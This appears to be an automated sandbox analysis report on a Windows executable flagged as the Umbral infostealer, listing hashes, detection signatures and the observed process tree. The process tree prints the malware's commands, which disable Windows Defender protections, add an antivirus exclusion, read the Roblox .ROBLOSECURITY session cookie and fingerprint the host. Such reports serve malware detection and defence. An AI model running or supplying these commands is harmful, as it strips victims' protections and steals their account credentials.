Resubmissions

Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    05-06-2024 16:50

General

  • Target

    C37Bootstrapper.exe

  • Size

    407KB

  • MD5

    2a25b9d935c4fe0a9f85251ecabfd923

  • SHA1

    bebbdce90e0ba9eb1cf388f0db17dbb97775e9e2

  • SHA256

    b5015182ecaa7561f27090fb7b2aab0decbbffc94606225b12676dc720266498

  • SHA512

    08f31d8e8867fcdadb209d28ad3f654b694fe5ec19a289871d758ab75d7759f08c4b8f01c789be22c2e83dafa8ec9e861479003e1e091038074471c701bf9dbf

  • SSDEEP

    6144:oloZMLrIkd8g+EtXHkv/iD4I7lXrRiK1AwBzOurZpjb8e1mVi4qkRH:2oZ0L+EP8I7lXrRiK1AwBzOurzr4J

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\C37Bootstrapper.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1032
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1564
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1436
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2164
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2820

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7M88HCOK7OWE8BIM874W.temp

        Filesize

        7KB

        MD5

        715d99a300d29002353caf6f3c2d02b3

        SHA1

        d42e755cc713feea511dfcf01fb0524677ea0aba

        SHA256

        6420d85b63fbc25d4ab3d953c1d57db8299c013f2a4c361f169c5ea733236023

        SHA512

        03973e39a7a9b48c190d7a5f3b51a2599e354802d28ed93dec4d235fa38037a59a31c91f9260f5c61152d89ba02d07912bfc1aecb060037d686e5c31cb7c6c96

      • memory/1580-0-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp

        Filesize

        4KB

      • memory/1580-1-0x0000000000A20000-0x0000000000A8C000-memory.dmp

        Filesize

        432KB

      • memory/1580-2-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

        Filesize

        9.9MB

      • memory/1580-47-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

        Filesize

        9.9MB

      • memory/2164-43-0x0000000001E10000-0x0000000001E18000-memory.dmp

        Filesize

        32KB

      • memory/2692-15-0x0000000001D90000-0x0000000001D98000-memory.dmp

        Filesize

        32KB

      • memory/2692-14-0x000000001B650000-0x000000001B932000-memory.dmp

        Filesize

        2.9MB

      • memory/2764-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

        Filesize

        2.9MB

      • memory/2764-8-0x0000000002240000-0x0000000002248000-memory.dmp

        Filesize

        32KB